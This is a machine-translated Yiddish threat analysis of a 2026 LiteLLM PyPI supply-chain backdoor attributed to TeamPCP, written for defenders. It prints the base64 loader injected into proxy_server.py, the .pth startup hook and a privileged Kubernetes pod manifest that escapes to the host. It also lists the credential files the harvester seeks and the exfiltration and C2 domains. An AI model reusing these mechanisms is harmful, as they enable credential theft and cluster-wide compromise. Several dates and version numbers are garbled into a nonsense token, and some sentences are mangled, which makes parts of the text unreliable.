LiteLLM סאַפּליי טשיין אַטאַק

LiteLLM צושטעל קייט אטאקע: ווי TeamPCP האט באַקדאָרט AI אינפראַסטרוקטור

וואָס דעם מאַטטערס

דעם 24סטן מערץ, 2026, די פּאָפּולערע פּיטהאָן פּעקל ליטעלם, אן אוניווערסאלער LLM פראקסי גייטוויי גענוצט דורך טויזנטער פון enterprises צו רוטן טראַפיק צווישן אַפּליקאַציעס און קינסטלעכע אינטעליגענץ פּראַוויידערז ווי OpenAI, Anthropic, Google, און AWS Bedrock, איז שטילערהייט קאָמפּראָמיטירט געוואָרן אויף PyPI. צוויי פאַר'סמטע ווערסיעס (1.82.7 און 1.82.8) זענען פאַרעפֿנטלעכט געוואָרן אין 13 מינוט איינע פון ​​די אַנדערע, טראָגנדיק אַ מולטי-סטאַדי פּיילאָוד וואָס האָט גע'גנב'עט קרעדענשעלס, אויסגעפילטערט וואָלקן סודות, פאַרשפּרייט זיך לאַטעראַל איבער Kubernetes קלאַסטערס, און אינסטאַלירט אַ פּערסיסטענט באַקדאָר מיט ווייַט קאָד עקסעקוטיאָן קייפּאַבילאַטיז.

מיט בעערעך 3.6 מיליאָן טעגלעכע דאַונלאָודז און טיפע דיפּלוימאַנט אַריבער וואָלקן-געבוירענע AI אינפראַסטרוקטור, ליטלעם זיצט ביים קרייצוועג פון אַלץ וואָס מאָדערנע אַטאַקערס באַגערן: API שליסלען פֿאַר יעדן הויפּט AI פּראַוויידער, וואָלקן IAM קראַדענטשאַלז, קובערנעטעס סודות, און SSH שליסלען.

אבער דער ליטעלם קאמפראמיס איז נישט געווען קיין איינציקע געשעעניש. עס איז געווען דער קולמינאציע פון ​​א פינף-טאגיקע, פינף-עקאסיסטעם קאמפיין דורך אַ סכּנה אַקטיאָר באַקאַנט ווי מאַנשאַפֿט פּי סי פי, א קאמפיין וואס האט ערשט פאר'סמ'ט זיכערהייט סקענערס (אקווא טריווי, טשעקמארקס קי-עס), און דערנאך גענוצט די גע'גנב'עטע CI/CD קרעדענצן צו קאַסקאַדירן דאַונסטרים אין npm, OpenVSX, און לעסאָף PyPI. די אַטאַקערז האָבן געוואָפן די זעלבע מכשירים אויף וועלכע אָרגאַניזאַציעס פאַרלאָזן זיך צו באַשיצן זייערע סאַפּליי קייטן.

די אטאקע רעפּרעזענטירט אַ גרויסע ענדערונג אין די סאָפיסטיקאַציע פון ​​סאַפּליי טשיין סאַקאָנען. די מולטי-האָפּ, קראָס-עקאָסיסטעם פּלאַן, קאָמפּראָמיסירט זיכערהייט מכשירים צו דערגרייכן הויך ווערט. קינסטלעכע אינטעליגענץ אינפראַסטרוקטור, שפיגלט אפ א שטאפל פון פלאנירונג און אפעראציאנעלע מאטוריטעט וואס איז קאנסיסטענט מיט די שטענדיג מער קאמאדיטיזירטע אטאקע געצייג. די פּיילאָודז זענען איטערירט געווארן אין רעאל-צייט (דריי פּיילאָוד וועריאַנטן דערשייַנען אין די קוואַל קאָד, אַרייַנגערעכנט קאָמענטירטע פריערדיגע ווערסיעס), די C2 אינפראַסטרוקטור איז רעגיסטרירט געווארן דעם טאָג פאר דער אטאקע, און די עקספילטראַציע דאָומיינען זענען קערפאַל אויסגעקליבן געווארן צו נאכמאכן לעגיטימע פארקויפער אינפראַסטרוקטור. דער סיסטעמאַטיש קאָמפּרעהענסיוו קרעדענשאַל האַרוועסטער, וואָס דעקט 15+ קאַטעגאָריעס אַרייַנגערעכנט נישע צילן ווי קאַרדאַנאָ סיינינג שליסלען און וויירעגאַרד קאָנפיגס, סאַגדזשעסטירט א גראַד פון גרינטלעכקייט וואָס ווייזט צו AI-אַסיסטעד מאַלוואַרע אַנטוויקלונג ווי אַ קראַפט מולטיפּלייער.

טיימליין

דאַטע (UTC) געשעעניש
מאַרץ קסנומקס TeamPCP קאָמפּראָמיטירט Aqua Trivy GitHub Action טעגס, און פאַרבייט זיי מיט בייזוויליקע קאָד וואָס עקספילטרירט. CI/CD סודות פון די אונטערשטע רעפאזיטאריעס
מאַרץ קסנומקס קאָמפּראָמיס עקסטענדעד צו Checkmarx KICS און AST GitHub Actions ניצן ענלעכע טעקניקס.
22סטן מערץ, 06:35 BerriAI פּאַבלישאַז Litellm 1.82.6 (לעצטע ריין ווערסיע) דורך נאָרמאַל CI/CD pipeline וואָס ניצט טריווי פֿאַר זיכערהייט סקאַנינג
מאַרץ קסנומקס TeamPCP רעגיסטרירט models.litellm.cloud (עקספילטראַציע דאָמעין). קאָמפּראָמיטירט 66+ npm פּאַקאַדזשאַז און OpenVSX עקסטענשאַנז.
24סטן מערץ, 10:39 ליטעלם 1.82.7 ארויסגעגעבן צו PyPI -- פּיילאָוד אינדזשעקטעד אין proxy_server.py ביי מאָדול פאַרנעם. עקסעקוטירט ביי אימפארט
24סטן מערץ, 10:52 ליטעלם 1.82.8 ארויסגעגעבן 13 מינוט שפּעטער -- לייגט צו litellm_init.pth, א פּיטהאָן פּאַט קאָנפיגוראַציע הוק וואָס עקסעקוטירט אויף יעדן פּיטהאָן אינטערפּרעטער סטאַרטאַפּ, נישט נאָר ליטעלם אימפארטן. ווייזט שנעלע פּיילאָוד איטעראַציע.
24סטן מערץ, ~16:00 PyPI נעמט אַוועק ביידע ווערסיעס נאָך קהילה באַריכטן. ווערסיעס ווערן גאָר אויסגעמעקט (נישט אַרויסגעריסן) פֿון אינדעקס, כאָטש CDN טאַרבאָלס בלייבן צוטריטלעך.

עקספּאָוזשער פֿענצטער: בערך 5.5 שעה. בעת דעם צייט, יעדע pip install litellm, pip install --upgrade litellm, אדער CI/CD pipeline ארויסציען די לעצטע ווערסיע וואלט אויסגעפירט די פּיילאָוד.

ווי אזוי די מאַלווער איז אַרײַן: די קאַסקיידינג קאָמפּראָמיס

דער ליטלעם פּעקל איז נישט גלייך געוואָרן דורכגעבראָכן. דער אַטאַקירער האָט עס דערגרייכט דורך אַ צוויי-האָפּ סאַפּליי טשיין אַטאַק:

Aqua Trivy GitHub Action (compromised March 19)     --> LiteLLM CI/CD pipeline runs Trivy without pinned version         --> Malicious Trivy exfiltrates PYPI_PUBLISH token from GitHub Actions runner             --> Attacker publishes poisoned litellm 1.82.7 and 1.82.8 directly to PyPI

לייטעלם'ס CI/CD pipeline גענוצט טריווי אלס א זיכערהייט סקענער — די זעלבע געצייג וואס איז געמאכט געווארן צו כאפן שוואכקייטן איז אליין געווען דער אטאקע וועקטאָר. ווייל די pipeline רעפערענצירט טריווי דורך אַ טויטאַבל טאַג אַנשטאָט אַ פּינד commit SHA, די קאָמפּראָמיטירטע אַקציע איז געלאָפן אויטאָמאַטיש. די בייזוויליקע Trivy אַקציע האָט אויסגעפֿילטרירט סביבה סודות, אַרייַנגערעכנט די PYPI_PUBLISH טאָקען, וואָס גיט TeamPCP דירעקטן פּובליקאַציע אַקסעס צום litellm PyPI פּראָיעקט.

די "קאמפראמיטירן די וועכטער" סטראטעגיע איז א סימן פון דער TeamPCP קאמפיין. דורך צילן ערשט זיכערהייט מכשירים (Trivy, Checkmarx KICS), האבן די אנפאלער גלייכצייטיג אויסגעשעפט דעטעקציע און באקומען פריווילעגירט צוטריט צו די אונטערשטע צושטעל קייטן.

טעכנישע אנאליז: די פּיילאָוד

אינדזשעקציע פונקטן

ווערסיע קסנומקס — מאָדול-לעוועל אויספירונג אין litellm/proxy/proxy_server.py (ליניע 128):

import subprocess, base64, sys, tempfile, os  b64_payload = "<~12KB base64 blob>"  with tempfile.TemporaryDirectory() as d:     p = os.path.join(d, "p.py")     with open(p, "wb") as f:         f.write(base64.b64decode(b64_payload))     subprocess.run([sys.executable, p])

די קאָד זיצט אין מאָדול סקאָופּ צווישן אַ ווערטערבוך ליטעראַל און דעם אָריגינעלן showwarning() פונקציע. עס ווערט גלייך אויסגעפֿירט ווען litellm.proxy.proxy_server ווערט אימפארטירט — וואס פאסירט ביי יעדער באניץ פון ליטעלם'ס פראקסי פונקציאנאליטעט.

ווערסיע קסנומקס — צוגעגעבן litellm_init.pth (פּיטהאָן פּאַט קאָנפיגוראַציע טעקע):

import os, subprocess, sys; subprocess.Popen([sys.executable, "-c", "import base64; exec(base64.b64decode('...'))"], ...) 

פּיטהאָן .pth טעקעס אין site-packages/ ווערן פּראַסעסט ביי יעדן איבערזעצער סטאַרטאַפּ, אָבער נאָר שורות וואָס הייבן זיך אָן מיט import ווערן אויסגעפירט ווי קאָד. דער אַטאַקירער נוצט דאָס אויס דורך קייטן די גאַנצע פּיילאָוד צו אַן איינציקן import דערקלערונג: import os, subprocess, sys; subprocess.Popen(...)דאָס איז פיל מער אַגרעסיוו ווי די proxy_server.py אינדזשעקשאַן — עס פייערט זיך אפילו אויב litellm ווערט קיינמאָל נישט אימפארטירט, ביי יעדן פּיטהאָן פּראָצעס לאָנטש. pyproject.toml איז געענדערט געווארן צו ארייננעמען דעם פייל אין דער פארשפרייטונג:

include = [     { path = "litellm_init.pth", format = ["sdist", "wheel"] } ]

ווערסיע 1.82.8 האט אזוי צוויי אומאפהענגיקע אויספיר-וועגןדי proxy_server.py אינדזשעקציע (ארבעט אויף litellm פראקסי אימפארט) און די .pth טעקע (ארבעט אויף יעדן פּיטהאן סטארטאפ). די איבעריקייט אליין איז באמערקענסווערט — עס באשיצט קעגן דעטעקציע אדער אראפנעמען פון יעדן וועג אליין. די עסקאלאציע פון ​​אימפארט-צייט צו סטארטאפ-צייט אויספירונג נאר 13 מינוט נאך 1.82.7 ווייזט אז דער אטאקירער האט מאניטארירט דעם ערפאלג פון דיפלוימענט און שנעל איטערירט.

שטאַפּל 1: קאָמפּרעהענסיוו קרעדענשאַל האַרוועסטינג

דער דעקאָדירטער אינערלעכער שריפט איז אַ פּינקטלעכער קרעדענשאַלער וואַקוום. עס ניצט os.walk()glob.glob()subprocess.check_output(), און דירעקטע טעקע לייענט צו דורכקוקן די גאנצע סיסטעם:

קאַטעגאָריע טאַרגאַץ
סיסטעם רעקאָנסטרוקציע hostname, whoami, uname -a, ip addr, printenv, ip route
סש ~/.ssh/id_rsa, id_ed25519, id_ecdsa, authorized_keys, known_hosts, config; האָסט שליסלען פֿון /etc/ssh/
וואָלקן (AWS) ~/.aws/credentials, ~/.aws/configIMDS ראָלע קראַדענטשאַלז דורך 169.254.169.254סודות מענעדזשער ListSecrets; ס.ס.מ. DescribeParameters
וואָלקן (GCP) ~/.config/gcloud/ (רעקורסיוו); $GOOGLE_APPLICATION_CREDENTIALS
וואָלקן (אַזור) ~/.azure/ (רעקורסיוו); סביבה וועריאַבאַלן
Kubernetes סערוויס אקאונט טאָקענס; ca.crtנעמענספּייס; kubectl get secrets --all-namespacesאַלע סודות דורך K8s API
סביבה טעקעס .env, .env.local, .env.production, .env.development, .env.staging — געזוכט רעקורסיוו (טיפקייט 6) אריבער /home, /root, /opt, /srv, /var/www, /app, /data, /tmp
דאָקקער ~/.docker/config.json, /kaniko/.docker/config.json
פּעקל טאָקענס ~/.npmrc, ~/.vault-token, ~/.netrc
דאַטאַבאַסעס ~/.pgpass, ~/.my.cnf, /etc/mysql/my.cnf, /etc/redis/redis.conf, מאָנגאָדב קאָנפיגוראַציעס
טלס / ססל פּריוואַטע שליסלען פֿון /etc/ssl/private/לאָמיר ענקריפּשאַן סערטיפיקאַטן, אַלע .pem/.key/.p12/.pfx טעקעס
גיין ~/.git-credentials, ~/.gitconfig
CI/CD terraform.tfvars, terraform.tfstate, .gitlab-ci.yml, Jenkinsfile, ansible.cfg
קריפּטאָ וואָלאַץ ביטקאָין, עטהערעום קיסטאָר, סאָלאַנאַ קיפּערז (וואַלידאַטאָר, שטימע, סטייק, פאָסעט), קאַרדאַנאָ סיינינג שליסלען, לייטקאָין, דאָגעקאָין, זקאַש, דאַש, ריפּפּלע, מאָנעראָ
שאָל געשיכטע .bash_history, .zsh_history, .mysql_history, .psql_history, .rediscli_history
סיסטעם אויטאָריזאַציע /etc/passwd, /etc/shadow, אויטאָריזאַציע לאָגס (אקצעפּטירטע SSH סעסיעס)
וועבהוק/API שליסלען גרעפּ פֿאַר סלעק וועבhooks, דיסקאָרד וועבhooks, API שליסלען/סודות אין קאָנפיג טעקעס
וופּן WireGuard קאָנפיגוראַציעס פֿון /etc/wireguard/

דער ציל פון דעם האַרוועסטער איז ענציקלאָפּעדיש. עס צילט נישט נאָר וואָלקן קראַדענטשאַלז, נאָר אויך קריפּטאָקוררענסי וואָלאַץ, דאַטאַבייס פּאַסווערדז, VPN קאָנפיגוראַציעס, און CI/CD סודות — וואָס סאַגדזשעסטירט אַז דער אַטאַקירער פּלאַנירט צו מאָנעטיזירן קאָמפּראָמיטירטע סיסטעמען אַריבער קייפל וועקטאָרן.

סטאַגע 2: ענקריפּטיד עקספילטראַטיאָן

גע'גנב'עטע דאטן ווערן ענקריפּטירט און עקספילטרירט ניצנדיק א כייבריד ענקריפּשאַן סכעמע:

  • AES-256-CBC ענקריפּשאַן פון אַלע געזאַמלטע דאַטן מיט אַ ראַנדאָם 32-בייט סעסיע שליסל (דורך openssl enc)
  • RSA-4096 ענקריפּשאַן פון די סעסיע שליסל ניצן די אַטאַקירער ס עמבעדעד עפנטלעך שליסל (OAEP פּאַדינג, דורך openssl pkeyutl)
  • ביידע ציפערטעקסט טעקעס באַנדאַלד ווי tpcp.tar.gz (די tpcp פּרעפיקס — "TeamPCP" — ערשיינט קאָנסיסטענט איבער דער גאַנצער קאַמפּיין)
  • HTTPS פּאָסט צו https://models.litellm.cloud/ מיט Content-Type: application/octet-stream

די פעלד models.litellm.cloud איז רעגיסטרירט געוואָרן דעם 23סטן מערץ — איין טאָג פֿאַר דער אַטאַקע — און איז דיזיינד צו פֿאַרמישן זיך מיט לעגיטימע ליטלעם אינפֿראַסטרוקטור (דער עכטער פּראָיעקט ניצט litellm.aiאפילו א נעץ-באוואוסטזיניגער פארטיידיקער וואס קוקט איבער ארויסגייענדיקן טראפיק קען אפשר נישט אנצייגן טראפיק צו וואס שיינט צו זיין ליטלם'ס אייגענעם מאדעל ענדפונקט.

שטאַפּל 3: שטענדיקע באַקדאָר (sysmon.py)

די פּיילאָוד אינסטאַלירט אַ פּאָלינג באַקדאָר פֿאַרשטעלט ווי סיסטעם טעלעמעטריע:

  • שטעג~/.config/sysmon/sysmon.py
  • דינסטsysmon.service (סיסטעםד באַניצער איינהייט, באַשריבן ווי "סיסטעם טעלעמעטרי סערוויס")
  • אָפּפירונגנאך אן ערשטן 300-סעקונדע שלאף, אנקעטעס https://checkmarx.zone/raw יעדע ~50 מינוט
  • דורכפירונג: דאַונלאָודט די URL צוריקגעגעבן דורך די C2 צו /tmp/pglog, שטעלט עס עקסעקוטאַבאַל (chmod 755), לויפט עס אין א אפגעזונדערטער סעסיע
  • שטאַט טראַקינג/tmp/.pg_state פאַרהיט ווידער דאַונלאָודינג די זעלבע פּיילאָוד
  • פּערסיסטאַנסRestart=alwaysRestartSec=10 — איבערלעבט קראַשיז און ריבוטס

די פעלד checkmarx.zone איז אַ טיפּאָסקוואַט פֿון טשעקמאַרקס (די זיכערהייט־פֿירמע בײַ checkmarx.com), דיזיינד אזוי אז SOC אנאליסטן וואס איבערקוקן נעץ לאגס זאלן זען טרעפיק צו וואס שיינט צו זיין א לעגיטימער זיכערהייט פארקויפער. דאס איז א באוואוסטזיניגע אויסמיידונג טעכניק וואס איז אין איינקלאנג מיט TeamPCP'ס ברייטערע סטראטעגיע פון ​​זיך באהאלטן אונטער זיכערהייט פארקויפער בראנדינג.

שטאַפּל 3ב: קובערנעטעס לאַטעראַל באַוועגונג

אויב די קאָמפּראָמיטירטע סיסטעם האט Kubernetes סערוויס אקאונט קראַדענטשאַלז, רעכנט די מאַלוואַרע אויס אַלע קלאַסטער נאָודז און דעפּלוייז פריווילעגירטע פּאָדס צו יעדן איינעם:

pod_manifest = {     'apiVersion': 'v1', 'kind': 'Pod',     'metadata': {'name': f'node-setup-{node_name[:35]}', 'namespace': 'kube-system'},     'spec': {         'nodeName': node_name,         'hostPID': True, 'hostNetwork': True,         'tolerations': [{'operator': 'Exists'}],         'containers': [{             'name': 'setup',             'image': 'alpine:latest',             'command': ['sh', '-c', drop_cmd],             'securityContext': {'privileged': True},             'volumeMounts': [{'name': 'host', 'mountPath': '/host'}]         }],         'volumes': [{'name': 'host', 'hostPath': {'path': '/'}}],         'restartPolicy': 'Never'     } }

יעדער קאַפּסל:

  • לויפט ווי זוכה מיט hostPIDhostNetwork, און פולער האָסט טעקע סיסטעם צוטריט
  • איר נוצן chroot /host צו אינסטאַלירן די זעלבע sysmon.py באַקדאָר אויף דעם באַלעבאָס'ס וואָרצל טעקע סיסטעם
  • רעגיסטרירט עס ווי אַ סיסטעמדי סערוויס, וואָס זאָרגט דערפאַר אַז די פּערסיסטענס בלייבט איבער נאָך די פּאָד אויסמעקן
  • געהייסן node-setup-* אין די kube-system נעמענספּייס צו דערשייַנען ווי לעגיטימע קלאַסטער אינפראַסטרוקטור

דאס מיינט א איין קאָמפּראָמיטירט CI/CD דער לויפער מיט K8s צוטריט קען רעזולטירן אין יעדן נאָדע אין דעם קלאַסטער ווערן באַקדאָרד — אַ קאַטאַסטראָפֿישער לאַטעראַלער באַוועגונג סצענאַר פֿאַר אָרגאַניזאַציעס וואָס לויפן ליטעלם ווי אַ פּראַקסי אין קובערנעטעס.

פּיילאָוד עוואָלוציע (קאָמענטירטע וואַריאַנטן)

דער קוואַל קאָד ביי שורות 131-132 אנטהאלט צוויי קאמענטירטע פריערדיגע פּיילאָוד וועריאַנטן, וואָס אַנטפּלעקן דעם אַטאַקירער'ס אַנטוויקלונג פּראָצעס:

  • אַלע דריי וואַריאַנטן טיילן די זעלבע עקספילטראַציע אינפראַסטרוקטור (models.litellm.cloud), RSA-4096 עפנטלעכער שליסל, AES-256-CBC + RSA כייבריד ענקריפּשאַן ראַפּער, און tpcp.tar.gz פּעקל נאַמינג
  • פריערע וועריאַנטן צוגעגעבן אַ RC4 ענקריפּשאַן שיכט אינעווייניק פון דעם דאַטן זאַמלונג סקריפּט, ענקריפּטינג די געזאַמלטע דאַטן איידער די אויסערלעכע AES+RSA ראַפּער. די אַקטיווע פּיילאָוד (ליניע 130) איז פאַרפּשוטעט געוואָרן דורך אַוועקנעמען דעם אינערלעכן RC4 שיכט.
  • די פריערע וועריאנטן נוצן exec() מיט StringIO כאַפּן צו לויפן דעם קאַלעקטאָר אין-פּראָצעס, בשעת די אַקטיווע פּיילאָוד ניצט subprocess.run() מיט stdout רידערעקט — א ריינערע צעשיידונג וואָס פֿאַרמייַדט פֿאַרפּעסטיקונג פֿון דעם האָסט פּראָצעס.
  • אלע דריי וועריאנטן צילן די זעלבע קרעדענשאַל קאַטעגאָריעס און זאַמלונג פּאַטס
  • דער RC4 שליסל אין די פריערדיקע וואריאנטן איז געווען א פראוואקאטיווע קללה, וואס איז אין איינקלאנג מיט דעם אקטיאר'ס אויפמערקזאמקייט-זוכנדיקן אויפפירונג אויף טעלעגראם.

דאָס אַנטפּלעקט אַקטיווע אַנטוויקלונג בעת דער אָפּעראַציע. דער אַטאַקירער האָט פֿאַרפּשוטערט דעם ענקריפּשאַן סטאַק און פֿאַרבעסערט עקסעקוציע איזאָלאַציע בשעת ער האַלט די זאַמלונג צילן און עקספֿילטראַציע אינפֿראַסטרוקטור סטאַביל.

אינדיקאַטאָרן פון קאָמפּראָמיס (IOCs)

נעץ

ינדיקאַטאָר טיפּ ציל
models.litellm.cloud פעלד עקספילטראַטיאָן ענדפּוינט (HTTPS POST)
checkmarx.zone פעלד C2 פּאָלינג ענדפּוינט (HTTPS GET /raw)

באַמערקונג: עקסטערנע באריכטן לינקס checkmarx.zone/static/checkmarx-util-1.0.4.tgz צו דער פריערדיקער KICS פאַזע פון ​​דער TeamPCP קאמפיין. די URL איז נישט געפונען געוואָרן אין די litellm פּיילאָודז וואָס זענען דאָ אַנאַליזירט געוואָרן.

פּעקל העשעס

טעקע שאַקסנומקס
litellm-1.82.7.tar.gz 8a2a05fd8bdc329c8a86d2d08229d167500c01ecad06e40477c49fb0096efdea
litellm-1.82.8.tar.gz d39f4e7a218053cce976c91eacf184cf09a6960c731cc9d66d8e1a53406593a5

טעקע סיסטעם

ינדיקאַטאָר טיפּ ציל
~/.config/sysmon/sysmon.py טעקע שטענדיקע באַקדאָר סקריפּט
~/.config/systemd/user/sysmon.service טעקע סיסטעמד פּערסיסטענס יוניט
/tmp/pglog טעקע דאַונלאָודעד צווייטע-שטאַפּל ביינערי
/tmp/.pg_state טעקע C2 שטאַט טראַקינג
litellm_init.pth in site-packages/ טעקע פּיטהאָן סטאַרטאַפּ קרוק (נאָר ווערסיע 1.82.8)
tpcp.tar.gz טעקע ענקריפּטעד עקספילטראַציע פּעקל

Kubernetes

ינדיקאַטאָר טיפּ ציל
node-setup-* פּאָדס אין kube-system פּאָד פּריווילעגירטע לאַטעראַל באַוועגונג פּאָדס
sysmon.service אויף קלאַסטער נאָודז דינסט האָסט-לעוועל פּערסיסטענס דורך פּאָד עסקייפּ

קריפּטאָגראַפיק

ינדיקאַטאָר דעטאַילס
אטאקירער RSA-4096 עפנטלעכער שליסל SHA256 פינגער-אפדרוק: bc40e5e2c438032bac4dec2ad61eedd4e7c162a8b42004774f6e4330d8137ba8איינגעבויט אין אלע דריי פּיילאָוד וועריאַנטן; דער זעלביקער שליסל געמאלדן איבער אנדערע TeamPCP אַפּעריישאַנז
tpcp פּרעפיקס אין אַרטיפאַקטן באַנדל נאַמינג קאָנווענשאַן (tpcp.tar.gz) קאָנסיסטענט איבער דער גאנצער קאמפיין

צושרייבונג: TeamPCP

דער סכּנה־אַקטיאָר הינטער דעם קאַמפּיין ווערט נאָכגעפֿאָלגט ווי מאַנשאַפֿט פּי סי פי, אויך באַקאַנט ווי PCPcat, Persy_PCP, ShellForce, און DeadCatx3.

באַקאַנטע כאַראַקטעריסטיקס:

  • האַלט טעלעגראַם קאַנאַלן ביי @Persy_PCP און @teampcp וואו זיי האבן געשפּאָטט זיכערהייט קאָמפּאַניעס
  • ארבעט איבער קייפל עקאָסיסטעמען (GitHub Actions, PyPI, npm, OpenVSX)
  • ניצט פארקויפער-ספעציפישע טיפאסקוואט דאמעינען פאר יעדער פאזע פון ​​דער קאמפיין (למשל, checkmarx.zone פֿאַר טשעקמאַרקס, models.litellm.cloud פֿאַר ליטעלם)
  • קאָנסיסטענטע אינפראַסטרוקטור מאַרקערס: זעלבע RSA שליסל פּאָר, tpcp.tar.gz נאַמינג קאָנווענשאַן, tpcp-docs-* גיטהאב רעפאזיטאריעס גענוצט אלס דעד-דראפ סטעידזשינג
  • צילט זיכערהייט מכשירים ווי אריינגאנג פונקטן צו דאַונסטרים סאַפּליי טשיינז

אַטריביוט בטחוןהויך. דער געטיילטער RSA עפנטלעכער שליסל, tpcp אַרטיפאַקט נאַמינג, C2 אינפראַסטרוקטור אָוווערלאַפּ, און אָפּעראַציאָנעל טעמפּאָ איבער די פינף-טאָג קאַמפּיין פֿאַרבינדן שטאַרק די Trivy, KICS, npm, OpenVSX, און litellm קאָמפּראָמיסן צו דער זעלבער אַקטיאָר.

מאָוטאַוויישאַןמסתּמא פינאַנציעל (קריפּטאָ בייַטל גנייווע, וואָלקן קרעדענשאַל מאָנעטיזאַציע) קאַמביינד מיט באַרימטקייט (טעלעגראַם טאַנטינג). די ברייט פון קרעדענשאַל כאַרוואַסטינג - פון AWS IAM צו סאָלאַנאַ וואַלידאַטאָר קיפּערז צו וויירעגאַרד קאָנפיגס - סאַגדזשעסטיד אַ פינאַנציעל מאָטיווירט אַקטיאָר וואָס זוכט צו מאַקסאַמייז ROI פון יעדער קאָמפּראָמיס.

מעגלעכע הילף מיט קינסטלעכער אינטעליגענץדער קרעדענשאַל האַרוועסטער איז סיסטעמאַטיש קאָמפּרעהענסיוו — 15+ קאַטעגאָריעס אַרייַנגערעכנט נישע טאַרגאַץ ווי קאַרדאַנאָ סיינינג שליסלען, וויירעגאַרד קאָנפיגס, און קאַניקאָ דאָקער קרעדענשאַלז — אין אַ וועג וואָס איז קאָנסיסטענט מיט AI-אַסיסטעד ענומעריישאַן. די גיכקייט פון פּיילאָוד איטעראַטיאָן (דריי וועריאַנץ מיט פאַרשידענע ענקריפּשאַן סכעמעס), קראָס-עקאָסיסטעם קאָאָרדינאַציע (5 עקאָסיסטאַמז אין 5 טעג), און אָפּעראַציאָנעל OPSEC (ווענדאָר-ימפּערסאַנייטינג דאָומיינז, כייבריד ענקריפּשאַן, סיסטעמד פּערסיסטאַנס קאַמפיוד ווי טעלעמעטרי) פֿאָרשלאָגן אַ מדרגה פון דורכפיר וואָס קען שפּיגלען AI-אַסיסטעד אַנטוויקלונג ווי אַ קראַפט מולטיפּלייער. די אַסעסמאַנט איז ספּעקולאַטיוו; באָקע אָפּעראַטאָרן קענען דערגרייכן ענלעכע פאַרנעם אָן AI טולינג.

נייע TTP'ס און טעכניקן

1. זיכערהייט געצייַג צושטעל קייט פאַרסאַמונג (T1195.002 וואַריאַנט)

קאָמפּראָמיטירן זיכערהייט סקאַנערס (Trivy, KICS) ווי אַ ערשטער-האָפּ צו דערגרייכן דאַונסטרים צילן איז אַ נייע עסאַקאַלאַציע. דער אַטאַקירער האט נישט נאָר קאָמפּראָמיטירט אַ ביבליאָטעק - זיי האבן קאָמפּראָמיטירט די מכשירים וואָס אָרגאַניזאַציעס נוצן צו... דיטעקט קאָמפּראָמיטירטע ביבליאָטעקן. דאָס שאַפט אַ בלינדן פלעק: דער סקאַנער וואָס זאָל כאַפּן דעם בייזוויליקן קאָד איז אַליין דער ליפערונג מעקאַניזם.

2 פּיטהאָן .pth טעקע פּערסיסטענס (T1546)

די litellm_init.pth טעכניק אין ווערסיע 1.82.8 איז באַזונדערס געפֿערלעך. .pth טעקעס אין site-packages/ ווערן פּראַסעסט ביי יעדן איבערזעצער סטאַרטאַפּ; יעדע שורה אָנהייבנדיק מיט import ווערט אויסגעפירט ווי קאָד. דורך קייטן די פּיילאָוד צו אַ איין import סטעיטמענט, דער אטאקירער דערגרייכט אויספירונג אויף יעדן פּיטהאָן פּראָצעס — נישט נאָר ווען ליטלעם ווערט אימפארטירט. דאָס מיינט אַז די פּיילאָוד ארבעט אפילו אויב ליטלעם איז אינסטאַלירט אָבער קיינמאָל נישט געניצט, און עס איבערלעבט די רעמעדיאַציע וואָס פאַרבייַט די קאָמפּראָמיטירטע .py טעקעס אָן קאָנטראָלירן פֿאַר .pth טעקעס.

3. קובערנעטעס קלאַסטער-ברייט לאַטעראַל באַוועגונג דורך פּריווילעגירטע פּאָד דיפּלוימאַנט (T1610, T1611)

די אויטאָמאַטישע שאַפונג פון פּריווילעגירטע פּאָדס אויף יעדן קלאַסטער נאָדע — מיט hostPIDhostNetwork, האָסט טעקע סיסטעם מאָונט, און chroot צו אינסטאלירן פּערסיסטענס — קייטן קאנטעינער דיפּלוימאַנט (T1610) מיט עסקייפּ צו האָסט (T1611) צו פארוואנדלען אן איינציקע קאמפראמיזירטע ארבעטסלאסט אין א פולע קלאסטער קאמפראמיס.

4. פארקויפער-נאכמאכנדיק C2 אינפראַסטרוקטור

ניצן models.litellm.cloud (נאכמאכט ליטעלם) און checkmarx.zone (נאכמאכט טשעקמארקס) אלס C2/exfil ענדפונקטן איז דיזיינט צו פארמיידן נעץ מאניטארינג. SOC אנאליסטן וואס איבערקוקן ארויסגייענדיקע טראפיק וואלטן געזען HTTPS קאנעקשאנס צו וואס זעען אויס ווי לעגיטימע פארקויפער דאמעינס.

5. שנעלע אין-פלי פּיילאָוד איטעראַציע

ארויסגעבן ווערסיע 1.82.7 מיט אימפארט-צייט אויספירונג, און דערנאך ווערסיע 1.82.8 מיט סטארט-אפ-צייט אויספירונג 13 מינוט שפעטער, ווייזט ווי דער אטאקירער מאניטארירט און אדאפטירט אין רעאל-צייט. די קאמענטירטע פיילד וואריאנטן (מיט פארשידענע ענקריפשאן סכעמעס) וואס זענען אויפגעהיט אין דעם קוואל קאוד באשטעטיגן אקטיווע אנטוויקלונג בעת דער אפעראציע.

וואָס קענען זיין געטאן

די אטאקע נוצט אויס צוטרוי אויף יעדן שיכט: צוטרוי אין זיכערהייט מכשירים, צוטרוי אין פּעקל רעגיסטריז, צוטרוי אין באַקאַנט-אויסזעענדיקע דאָמעינען, צוטרוי אין CI/CD אויטאָמאַציע. זיך פֿאַרטיידיקן דערקעגן פֿאָדערט פֿאַרהאַרטן יעדן פֿון די פֿאַרטרוי גרענעצן:

פֿאַר פּאַקעט קאָנסומערס

  • פּין דיפּענדאַנסיז לויט האַש, נישט נאָר ווערסיע. pip install litellm==1.82.6 --hash=sha256:... וואָלט פאַרהיטן די קאָמפּראָמיטירטע ווערסיעס פון ווערן אינסטאַלירט אפילו אויב זיי וואָלטן פֿאַר אַ קורצע צייט דערשינען ווי די לעצטע ווערסיע.
  • ניצט לאקפיילן. pip-compilepoetry.lock, און uv.lock כאַפּן גענויע ווערסיעס און האַשעס. CI/CD זאָל אינסטאַלירן פֿון לאָקפֿײַלס, נישט פֿון פֿלאָטנדיקע ווערסיע ספּעציפֿיצירער.
  • מאָניטאָר פֿאַר .pth טעקעס. קעסיידער קאָנטראָלירן site-packages/ פֿאַר אומגעריכט .pth טעקעס — זיי עקסעקוטירן אויף יעדן פּיטהאָן סטאַרטאַפּ און זענען אַן אונטערגעשאַצט פּערסיסטענס מעקאַניזאַם.
  • אימפלעמענטירן אויסגאַנג נעץ קאָנטראָלס. די עקספילטראַציע צו models.litellm.cloud און C2 פּאָולינג צו checkmarx.zone קען זיין געכאפט געווארן דורך ערלויבעניש-באזירטע ארויסגאנג פֿילטערינג אין פּראָדוקציע סביבות.

פֿאַר פּעקל וישאַלטערס

